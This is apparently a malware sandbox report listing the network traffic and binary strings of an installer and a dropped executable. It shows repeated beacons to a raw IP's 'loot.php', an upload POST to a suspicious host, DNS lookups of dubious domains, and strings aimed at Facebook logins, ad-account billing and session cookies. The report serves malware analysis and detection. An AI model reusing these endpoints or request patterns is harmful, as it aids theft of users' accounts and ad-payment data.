                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: %_Sec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Referer: https://www.facebook.com/Sec-Fetch-Dest: documentOrigin: https://www.facebook.com*?[Upgrade-Insecure-Requests: 1 equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: /www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: Host: www.facebook.com equals www.facebook.com (Facebook)
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: Host: www.facebook.comloginKhe4g4 headerUg4e4GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: Origin: https://www.facebook.com equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: Referer: https://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: Sec-Fetch-Mode: navigateSQSec-Fetch-Site: same-originUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: document/ads/manager/account_settings/account_billingSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Upgrade-Insecure-Requests: 1api/graphql/?lll=pppwbConnection: keep-alivesec-ch-ua-mobile: ?0sec-ch-ua: " Not;A Brand";v="99", "Microsoft Edge";v="91", "Chromium";v="91"X-FB-Friendly-Name: BillingAMNexusRootQueryAccept: */*Origin: https://www.facebook.com%SSec-Fetch-Site: same-originSec-Fetch-Mode: cors:Sec-Fetch-Dest: emptyAccept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1/api/graphql/:Connection: keep-alivesec-ch-ua-mobile: ?0Accept: */*sec-ch-ua: " Not;A Brand";v="99", "Microsoft Edge";v="91", "Chromium";v="91"X-FB-Friendly-Name: BillingTransactionTableQuerySec-Fetch-Site: same-originOrigin: https://www.facebook.com0Sec-Fetch-Mode: cors1Sec-Fetch-Dest: empty%SAccept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1v10.0/act_Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Accept: */*Content-type: application/x-www-form-urlencodedReferer: https://www.facebook.com/Sec-Fetch-Site: same-siteOrigin: https://www.facebook.com1Sec-Fetch-Dest: empty.Sec-Fetch-Mode: corsprimary_location/infostateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9secure||viewport-width: 1920profile.phpmanager/account_settings/account_billingdomain//Sec-Fetch-Dest: documentc_user Sec-Fetch-Mode: navigate=Sec-Fetch-Site: none;Upgrade-Insecure-Requests: 1=pages/?category=your_pageshttps://www.facebook.com/ Sec-Fetch-Dest: document:Sec-Fetch-Mode: navigate=Sec-Fetch-Site: none:Sec-Fetch-User: ?1Upgrade-Insecure-Requests: 1SendingGh8eu4i proxyPj9k4eh credentialsMn7j4e=SendingGfe5g requestRgreh4elogin get cookie407_khfa4i TheGhehg4g proxyIje4hg requiresDge4gj89 authenticationQerhj4ghnameBreakHghel3g forPe4jjhg multipleTje7i4hg 407_uh7a4r responseP5orjteg=error_self1Error (WinHttpSetOption)domain1Error (WinHttpSetOption) equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http-x0X0@httpserror 9 code=Using WINHTTP_AUTH_SCHEME_NEGOTIATEUsing WINHTTP_AUTH_SCHEME_NTLMPOSTlogin/device-based/loginContent-Type: application/x-www-form-urlencodedhttp://staticimg.youtuuee.com//www.facebook.com/Host: www.facebook.comlogin/device-based/login equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/billing_history/summary/ equals www.facebook.com (Facebook)
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/manage/campaigns?act=fb_id equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: https://www.facebook.com/api/graphql/ equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: https://www.facebook.com/api/graphql/?lll=ppp equals www.facebook.com (Facebook)
                  Source: Mon17c604381c7047e.exeString found in binary or memory: https://www.facebook.com/login/device-based/login/ equals www.facebook.com (Facebook)
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.facebook.com/profile.php?id=c_user&sk=friends equals www.facebook.com (Facebook)
                  Source: global trafficDNS traffic detected: DNS query: hsiens.xyz
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
                  Source: global trafficDNS traffic detected: DNS query: t.gogamec.com
                  Source: global trafficDNS traffic detected: DNS query: topniemannpickshop.cc
                  Source: global trafficDNS traffic detected: DNS query: niemannbest.me
                  Source: global trafficDNS traffic detected: DNS query: all-mobile-pa1ments.com.mx
                  Source: global trafficDNS traffic detected: DNS query: buy-fantasy-football.com.sg
                  Source: global trafficDNS traffic detected: DNS query: iplogger.org
                  Source: global trafficDNS traffic detected: DNS query: ggg-cl.biz
                  Source: global trafficDNS traffic detected: DNS query: pastebin.com
                  Source: global trafficDNS traffic detected: DNS query: wfsdragon.ru
                  Source: global trafficDNS traffic detected: DNS query: gmpeople.com
                  Source: unknownHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmpeople.com/upload/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: gmpeople.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:10 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=AfndMd6V.01zjDiumP1PeZVw9D3mvKbYwSxt1mf4OCc-1724230630-1.0.1.1-Su3GzT_pD9Fd2iir70fJfh6iPQXBLIjlmncMkZj1espOH5eZjMkNvoYB2y22bW8fmUFV3kaNOu3P1T1jJXDenw; path=/; expires=Wed, 21-Aug-24 09:27:10 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbZHdRtMfj5bkjpOb%2FzbDVaL5UULNkIIWIl%2FXd449UHwSnz7ZV0luAlfszeirf7ZADcAxCHGgmAjuL2JC5gAPhfupHzk5XCQy7BGQfaT4gLz4L3caoPdoR4rzuDW9v0781jT%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=kDH.E_8UF2IoEITcXP_U.dJxTq9jfJMUGZtrXg380is-1724230630799-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696a026e8f43cb-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:16 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=Kf_VuceftkvZS0FPH4WUMRZQURdya_GLHzNI1zvjHyM-1724230636-1.0.1.1-r6Il9KxaCq4ZRPwxn7frVCAmPRFFrRIet8wSmHS7UwqEFeO.eFnUGttWsgmoF89kEnbFkHu4a2Xfeqd0nD_tgQ; path=/; expires=Wed, 21-Aug-24 09:27:16 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c9nez5obEMfbTn%2FXz243fxrIEoQqCXBEQheCbzHAITsf1sn58gbIwuBEI4h%2FZV8qZnKMYI4d1LgounAhGDgly8B18ltQE3UpfziRx1msT0kJwjl7mlueSuTOdRPsHQelIp%2FJOA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=jD4ZsvDd9vq70OPT5ILhDKCp_PeGb1kJS__E3NpTPVo-1724230636877-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696a286c9719c7-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:22 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=Vb4tNUszopoTKlKZCyzIQ9nbpFwgczMDsqzQz8Lfd.k-1724230642-1.0.1.1-7WwYIHnoE16UQljoMR6Qdu2Mc4CtrUDFK1zWrNEw99aK8F5Y50NaFU.79cEBagC9yQhQc2LNRnliFJPytWZxdg; path=/; expires=Wed, 21-Aug-24 09:27:22 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2B57LjwBbRJhiB%2B1yzh7MCmOVtH6mvDA6KF4v7IT4u7XR08Cpx6HZJAYKBja3BNHdC2y8ef5qy4p1Upavx6WfUg0G%2FcwHRjZAGpd23vdUdu42qfKAjHxnvQ8BB1mGh%2BEAOp1CQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=jJ_Aw6TKVgt4IWYlzPJYjZGyv5xjbxbQZx1WLIOYJSo-1724230642543-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696a4bdec00f49-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:28 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=rZ7VWVJTnKf5y6.8joyi_H0Z5j1_BcfGYSJpVIVcctw-1724230648-1.0.1.1-5TrN5OUCfTgRyoFnROqZ4O2Djew7SRKAZCsl8oGLCiv6WAhsD0uU884paD5iaTCSLvaVpCVyDzbcW4wH1uupdw; path=/; expires=Wed, 21-Aug-24 09:27:28 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yNyXCoxmfQjMYFr8wsYPf9IbqjpNKW3EJ2donBl4tCl%2BpCf89%2FSV2aNZ7zV0EqDqMDosm7eVtP524Nb2c8r60jTdkSKB1rR1J%2BJXcade%2FseV%2FqllNN9ph06g2MkOdPsdInfCiQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=lkblbI.hdcugeqnkS.eoRPCLlkfg5IFBgzT7nhXC8Ko-1724230648181-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696a6f181ac351-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=1801CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 8b696a74afdf423f-EWR
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:33 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=M2uO.1.PcACkGnZDsgrNCqmml2zVXqHzFQvKKBacpSE-1724230653-1.0.1.1-60ojZuLVEcG3c8NHRxN.kUPyVvY4lkWE8h.R3nFJlOGji1V1eG0dr04KsPo0x8EGiIZJEbBm2_IFicXSgatNJQ; path=/; expires=Wed, 21-Aug-24 09:27:33 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5zS7bLFu2w%2F3FjwhMtksCi95i9UdTj10Kpdjk4T4TpLyI9x%2BIlDta1f07Mq%2ByIfaV3YzANid1AtSyqIP9XP%2BSeouYUMnr36XVJYY7%2BmnLiLxvNhid7QrGNlAdrMZFbJopflaA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=g9cXa5aXWK95l.pZHUJh2luNMN6BxuFKyqIoO4XsDN0-1724230653839-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696a925f6c4211-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:39 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=eTOcN338iJPkKWDX6.nqa3zwWV0DsGurA5C3Yed6Zbs-1724230659-1.0.1.1-HSbqEhkiw1hJfJNcwXZieyCfMT0PwXC8nw1p.Aws4Yo0k3htruQKM9ZgN.sCUh0SCFELZd_GgIrqHkjST_HJqg; path=/; expires=Wed, 21-Aug-24 09:27:39 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVmRX5scst0fCvz0F%2Fk4JYIFD3K5UoJaUDUaKjxec53vGYufIR%2BX0HukOGHMZRijQmppVMZFtuJJoaBlm0pnLScyew09CYruop9DSYVwU5Gz%2F%2BgKyP0ycgAY3Wil9efdk%2BSdjw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=EXI_dRZVnDascO6a90jw3WVKoDmPE5WUxcaB86l5mtQ-1724230659453-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696ab58ccd41d3-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:45 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=8CVcyNZfC9nOorg38LU1pIJKYi5MqrmMXhCIT.F3fg8-1724230665-1.0.1.1-HXsEZewA7LjPb8P483nbiINrFDOR2v56uHdlA0kyEgBUUXyxo8SjvdLwPlO0dXl1alUmvt2q6lTKMb8XS.vg6g; path=/; expires=Wed, 21-Aug-24 09:27:45 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iGSIgPvvOdZ2T5qPQiexELLUhfyXkNGS619xCBK%2FmbWeb7Z90KTrPL8tu%2BUzlvq%2Bv4ZTlsf2zd4eTPAimkWG8bXAQ%2FwMrUDUclYy%2BO8Xb0RAjE3O6dE5uJAkKP%2Fp20AYQBPLhA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=FyAm59iaq4RnfE_eCoL4GeouO89J4T.7q_QY667W6BE-1724230665079-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696ad8a92d7c96-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:50 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=qU8rfA7XdmwSG5ysqqfRhYa0c5m0eTknlyPuY_X2Zc4-1724230670-1.0.1.1-aifQIHyl1IKHGCBxL30n0hpAvqvV2qItjnuTsTJRkyiHf14__klbUNOXwSphO8IAzAGrZMiBlNThUx99s5WHTw; path=/; expires=Wed, 21-Aug-24 09:27:50 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tqlj64OpuItPLuokibqTvasX99m19tzptAxCizZM1%2FsLfopaUum0CMiQU6%2FHtFqxbVCmC3RXu%2FeKb%2FOKVXT3hWp149CVzS9qoEAhui7MJb9Gajl6gmNrmzSCuxt4U6GV6bZZQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Ia86BkihzpSWVNbCkYJjIxbAuDBLdLrrD9.E_HB4N8Q-1724230670843-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696afcb9227ca5-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:56 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=6zuegI48FEcVXZfst96HdNFv3TSFNVQwFsPOqjTjm6g-1724230676-1.0.1.1-hGy1ywwrTckLgTjC26D6_F.xZwY0uh5hzm0UkHi9PHKJVTLj0Gvku2r29PHELhoJzbsqaKi0bf6H0gorhGoZqQ; path=/; expires=Wed, 21-Aug-24 09:27:56 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPoepVex4tK3GckkvYZLrn%2BXW4aB5tlxtZejxSeqd34%2FiHTfeIKl%2BpJZghmXz5xTae0gLtpJluBOK3OD6emk6GtaSht3QU6C6pLKvjSEG%2BZQetWa4IEomiUhs0G9HedxENq0qQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=cGD49sxET8z.WKWEjwxrS_ZECHJh9v4zpLMJHiP7KNI-1724230676489-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696b1ff87e4319-EWRalt-svc: h3=":443"; ma=86400
